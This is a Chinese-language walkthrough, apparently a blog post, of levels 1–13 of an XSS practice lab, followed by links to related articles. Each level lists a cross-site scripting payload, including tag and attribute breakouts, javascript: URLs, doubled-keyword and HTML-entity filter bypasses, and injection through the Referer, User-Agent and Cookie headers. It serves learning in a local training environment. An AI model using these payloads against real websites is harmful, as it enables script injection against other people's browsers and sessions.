XSS小游戏【1-13关】

第一关

Payload:<script>alert(1)</script>

第二关

Payload:keyword=<script>alert(1)</script> 发现没有成功,F12发现需要闭合input 标签

再次输入payload:aaa"><svg οnlοad=alert(1)>

//当这个输入被插入到网页中时,浏览器会将其解析为HTML代码,并执行其中的JavaScript代码

第三关

Payload:<script>alert(1)</script>

Payload:' οnfοcus=javascript:alert('xss') ' 要点击搜索再次按下搜索框就会出现

第四关

payload:<script>alert(1)</script>

F12查看数据源码, 注入测试后,发现过滤了>和<

Payload:"οnclick="alert(111)

第五关

payload:"><a href='javascript:alert(1)'>aa</a>

最后点击那两个蓝色的aa,就会提示你过关

第六关

payload:"><a hReF='javascript:alert(1)'>aa</a>

第7关

Payload:"><a hhrefref='javascscriptript:alert(1)'>'aa'</a>

第八关

payload:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41; 最后点击'友情链接'

第九关

payload:&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;//http://www.baidu.com

'添加友情链接->点击友情链接'

第十关

payload:?t_sort=" type="text" οnclick="alert(1)

第十一关(referer参数注入)

payload:referer:"type="text" οnclick="alert(1)

http://127.0.0.1/ljy22601239/xss/level11.php?keyword=good%20job!

第十二关(user-agent参数注入)

payload:User-Agent: "type="text" οnclick="alert(1)

第十三关(cookie参数绕过)

payload:Cookie: user="type="text" οnclick="javascript:alert(1)

保护cookie值,用到setcookie函数

相关推荐
味悲1 小时前
XSS、CSRF、SSRF学习笔记
安全·xss·csrf
Chengbei112 小时前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
德福危险13 小时前
富有想象力的XSS盲打:靶机练习之Tempus_fugit5
服务器·网络·xss
德福危险18 小时前
从盲打xss到到模板注入:unix靶机渗透之Tempus_fugit4
前端·unix·xss
憧憬成为web高手1 天前
皮卡丘靶场速通--XSS
前端·xss
ccino .2 天前
Hackerone-地址栏xss
网络安全·xss
txg6662 天前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
云水一下5 天前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型
云水一下6 天前
DVWA从入门到精通(十):XSS (Reflected)(反射型XSS)
xss·dvwa·反射型
玄玄子6 天前
xss前端解决方案
前端·浏览器·xss